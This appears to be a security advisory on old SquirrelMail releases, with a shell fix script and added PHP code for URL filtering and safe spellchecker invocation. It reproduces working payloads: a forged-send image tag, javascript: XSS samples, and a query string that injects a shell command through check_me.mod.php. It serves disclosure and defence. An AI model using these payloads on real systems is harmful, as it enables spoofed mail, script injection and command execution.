COMMAND

SquirrelMail can be fooled into sending spoofed messages and executing JavaScript

SYSTEMS AFFECTED

SquirrelMail < v 1.2.3

PROBLEM

Tom McAdam posted:

The compose.php script allows parameters to be passed as GETs. Therefore including the following in an HTML mail will send a message to x@y.com:

<img src="compose.php?send_to=x@y.com&subject=foo&bar=bar&send=1">

The read_body.php script does not check HTML tags for javascript. A trivial example:

<img src="javascript:alert('Oh dear')">

"appelast" added:

One of the plugins has a very interesting piece of code, from the file check_me.mod.php:

$sqspell_command = $SQSPELL_APP[$sqspell_use_app];
...
$floc = "$attachment_dir/$username_sqspell_data.txt";
...
exec ("cat $floc | $sqspell_command", $sqspell_output);

Everything should be ok, but where does this page include the config files in which $attachment_dir and the others are defined? Answer: nowhere. We can set up the variables $sqspell_command and $floc. Result? We can execute any command, of course as the http server owner.

Exploit:

host/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik

SOLUTION

Here is the fix for the arbitrary remote execution with httpd-user rights. Place this file in the squirrelmail/plugins/squirrelspell directory and execute it from there to fix the vulnerability. The script renames the plugin's module files from .mod.php to .mod and updates the two scripts that include them, so a direct request for check_me.mod.php no longer reaches a file the web server hands to PHP; make sure the web server is not configured to serve the renamed .mod files as plain text either.

--- begin sqspell_security_fix.sh ---
#!/bin/sh
sed "s/.mod.php/.mod/g" sqspell_interface.php > tmp.1
sed "s/.mod.php/.mod/g" sqspell_options.php > tmp.2
mv -f tmp.1 sqspell_interface.php
mv -f tmp.2 sqspell_options.php
cd modules
for FILE in *.mod.php; do
    NEWFILE=`echo $FILE | sed 's/.php//'`
    mv $FILE $NEWFILE
done
--- end sqspell_security_fix.sh ---

http://www.dulug.duke.edu/~icon/misc/security_fix.sh.txt

squirrelmail-1.2.4 will contain all fixes
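The two issues Tom McAdam reports share one root cause: read_body.php echoes URLs from an HTML mail to the browser unfiltered, so a relative src drives compose.php with the reader's own session, and a javascript: src runs script. The check below is an added example and is not SquirrelMail's code; the function names are hypothetical, the scheme allowlist (http, https, cid) is an assumption, and the sample URLs are constructed here.

```php
<?php
// Added example, not SquirrelMail's code: the URL check that read_body.php
// needed before echoing an <img src> from an HTML mail. Function names and
// the scheme allowlist are assumptions; the sample URLs are constructed.

// Return true only for absolute http:, https: or cid: URLs.
function safe_mail_url(string $raw): bool
{
    // Decode entities first: "java&#115;cript:" and "&#x6A;avascript:" are
    // the same scheme to the browser.
    $url = html_entity_decode($raw, ENT_QUOTES | ENT_HTML401, 'UTF-8');

    // Browsers skip control characters and whitespace when parsing the
    // scheme ("jav\tascript:", " JavaScript:"), so drop them before looking.
    $url = preg_replace('/[\x00-\x20\x7F]+/', '', $url);

    // A URL with no scheme is relative to the webmail origin and is fetched
    // with the reader's cookies, which is how <img src="compose.php?...">
    // sends mail on their behalf. Reject it along with any unknown scheme.
    if (!preg_match('/^([a-z][a-z0-9+.\-]*):/i', $url, $m)) {
        return false;
    }
    return in_array(strtolower($m[1]), ['http', 'https', 'cid'], true);
}

// Emit a src attribute, or nothing at all when the URL is not allowed.
function img_src_attribute(string $raw): string
{
    return safe_mail_url($raw)
        ? ' src="' . htmlspecialchars($raw, ENT_QUOTES, 'UTF-8') . '"'
        : '';
}

// Constructed sample inputs, including the two from the advisory.
$samples = [
    'http://www.example.org/logo.png',
    'cid:part1.19981230@example.org',
    "javascript:alert('Oh dear')",
    '  JavaScript:alert(1)',
    'java&#115;cript:alert(1)',
    "jav\tascript:alert(1)",
    'compose.php?send_to=x@y.com&subject=foo&bar=bar&send=1',
];
foreach ($samples as $u) {
    printf("%-56s %s\n", $u, safe_mail_url($u) ? 'allowed' : 'rejected');
}
```

Filtering the mail body only removes the automatic trigger; the reader can still be handed a link to compose.php, so the sending side needs fixing as well, by refusing to send on a GET and accepting the send action only from a POST that carries a per-session token.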
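The variable injection appelast describes works because, with register_globals on and no configuration file included, every variable named in the quoted check_me.mod.php lines is whatever the query string says it is. Below, as an added example that is not SquirrelMail's code, the vulnerable shape is rebuilt from the quoted lines next to a hardened version; the request layout, function names, the spellchecker table and the directory paths are assumptions for illustration.

```php
<?php
// Added example, not SquirrelMail's code: the variable-injection path that
// appelast describes in check_me.mod.php, and one way to close it.
// Request layout, function names, the allowlist and paths are assumptions.

// Vulnerable shape, rebuilt from the quoted lines. With register_globals on
// and no config file included, every variable below is whatever the request
// says it is; the returned string is exactly what exec() would be handed.
function vulnerable_command(array $req): string
{
    $SQSPELL_APP     = $req['SQSPELL_APP'];                  // attacker-supplied array
    $sqspell_command = $SQSPELL_APP[$req['sqspell_use_app']];
    $floc = "{$req['attachment_dir']}/{$req['username_sqspell_data']}.txt";
    return "cat $floc | $sqspell_command";
}

// Hardened version. The spellchecker is picked from a fixed table, the data
// directory comes from the application's own configuration, the username
// comes from the authenticated session and is restricted before it becomes
// a path component, and every token that reaches the shell is quoted.
const SQSPELL_ALLOWED = [                   // assumed table; paths are examples
    'English' => ['/usr/bin/ispell', '-a'],
    'German'  => ['/usr/bin/ispell', '-a', '-d', 'german'],
];

function hardened_command(array $req, string $attachment_dir, string $username): string
{
    $choice = $req['sqspell_use_app'] ?? '';
    if (!is_string($choice) || !array_key_exists($choice, SQSPELL_ALLOWED)) {
        throw new InvalidArgumentException('unknown spellchecker');
    }
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9_.@-]*$/', $username)) {
        throw new InvalidArgumentException('username contains unsafe characters');
    }
    $floc = rtrim($attachment_dir, '/') . "/{$username}.sqspell_data.txt";
    $argv = array_map('escapeshellarg', SQSPELL_ALLOWED[$choice]);
    return implode(' ', $argv) . ' < ' . escapeshellarg($floc);
}

// Constructed input: the query string from the advisory's exploit URL.
parse_str('SQSPELL_APP[blah]=wall%20hello&sqspell_use_app=blah'
        . '&attachment_dir=/tmp&username_sqspell_data=plik', $req);

echo "vulnerable: ", vulnerable_command($req), "\n";
try {
    echo "hardened:   ", hardened_command($req, '/var/local/squirrelmail/attach', 'alice'), "\n";
} catch (InvalidArgumentException $e) {
    echo "hardened:   rejected (", $e->getMessage(), ")\n";
}

// A legitimate choice still works.
$req['sqspell_use_app'] = 'English';
echo "hardened:   ", hardened_command($req, '/var/local/squirrelmail/attach', 'alice'), "\n";
```

For the advisory's query string, vulnerable_command() returns cat /tmp/plik.txt | wall hello, the command the original exec() call would have run as the web server user; hardened_command() rejects the same request because "blah" is not in the table, and attachment_dir and username_sqspell_data from the request are never read at all. Avoiding the shell entirely (proc_open with an argument array) would remove the need for escapeshellarg, but the allowlist is the fix that matters: a quoted but attacker-chosen program is still attacker code.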